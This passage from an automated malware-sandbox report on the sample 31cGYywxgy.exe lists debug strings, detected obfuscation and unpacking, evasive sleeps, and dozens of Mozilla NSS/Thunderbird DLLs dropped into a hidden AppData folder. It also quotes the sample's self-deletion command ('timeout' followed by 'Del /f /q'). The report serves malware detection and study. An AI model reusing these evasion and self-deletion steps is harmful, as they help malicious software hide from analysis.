Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source: Binary string: C:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: 31cGYywxgy.exe, 00000000.00000002.282980746.000000006E819000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source: Binary string: XC:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: 31cGYywxgy.exe, 00000000.00000002.282980746.000000006E819000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Unpacked PE file: 0.2.31cGYywxgy.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Unpacked PE file: 0.2.31cGYywxgy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004000BB push edx; retf 0_2_004000C2
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004407F0 push ecx; ret 0_2_00440803
PE file contains sections with non-standard names
Source: AccessibleHandler.dll.0.dr Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.0.dr Static PE information: section name: .orpc
Source: IA2Marshal.dll.0.dr Static PE information: section name: .orpc
Source: lgpllibs.dll.0.dr Static PE information: section name: .rodata
Source: MapiProxy.dll.0.dr Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.0.dr Static PE information: section name: .orpc
Source: mozglue.dll.0.dr Static PE information: section name: .didat
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 0_2_0042A2F9
Binary contains a suspicious time stamp
Source: ucrtbase.dll.0.dr Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.97515614602

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Users\user\Desktop\31cGYywxgy.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe'
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004206DD __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004206DD

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\31cGYywxgy.exe TID: 2212 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6612 Thread sleep count: 93 > 30
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll
